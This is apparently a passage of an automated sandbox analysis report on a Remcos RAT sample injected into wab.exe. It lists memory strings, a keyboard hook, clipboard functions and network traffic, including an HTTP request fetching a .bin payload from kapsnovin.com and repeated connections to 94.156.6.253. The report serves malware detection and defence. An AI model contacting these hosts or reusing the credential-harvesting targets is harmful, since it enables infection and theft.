              Source: wab.exe, 00000004.00000003.12118574079.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117762141.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118680474.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117950906.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118788842.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117881357.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118627581.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12115114712.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117180349.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12116911090.00000000046CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117642956.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12116958853.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12116834528.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12128117793.00000000046BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117504774.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118010524.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117826187.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117417668.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118733760.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117107256.0000000004EC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117826187.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117417668.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118733760.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117107256.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117029806.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12117702946.0000000004EC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12118480673.0000000004EC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
              Source: wab.exe, 00000004.00000003.12115114712.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
              Source: wab.exe, 00000004.00000003.12124781462.00000000046D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tpc.g
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
              Source: wab.exe, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/https://
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pa
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pagead/drt/ui
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=ie
              Source: wab.exe, 00000004.00000003.12115114712.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
              Source: wab.exe, 00000004.00000003.12115114712.00000000046C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/https://
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/https://www.msn.com/de-c
              Source: wab.exe, 00000004.00000003.12121610640.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.12121656813.00000000046CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp
              Source: wab.exe, 00000004.00000003.12119597767.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
              Source: unknownDNS traffic detected: queries for: kapsnovin.com
              Source: global trafficHTTP traffic detected: GET /KvGfOfeyMpEaqpzI164.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: kapsnovin.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: wab.exe, 00000002.00000002.16935529143.0000000037530000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, 00000004.00000003.12123097853.00000000046D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_o
              Source: wab.exe, 00000004.00000003.12123097853.00000000046D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_o
              Source: wab.exe, 00000004.00000003.12124301647.00000000046DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain
              Source: wab.exe, 00000004.00000003.12124301647.00000000046DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain
              Source: wab.exe, wab.exe, 00000006.00000002.12095725931.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000004.00000003.12127760939.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 00000004.00000003.12127760939.00000000046C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 00000002.00000002.16935346240.00000000374A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000002.00000002.16935346240.00000000374A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Contains functionality to modify clipboard data
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,4_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,4_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00406B9A EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_00406B9A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_00406C3D EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,5_2_00406C3D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,6_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,6_2_004072B5
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_004052EE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052EE

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4672, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_00404B2B0_2_00404B2B
              Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exeCode function: 0_2_004068690_2_00406869
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_3756B5C12_2_3756B5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_375771942_2_37577194
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00406E8F4_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044B0404_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0043610D4_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004473104_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0044A4904_2_0044A490
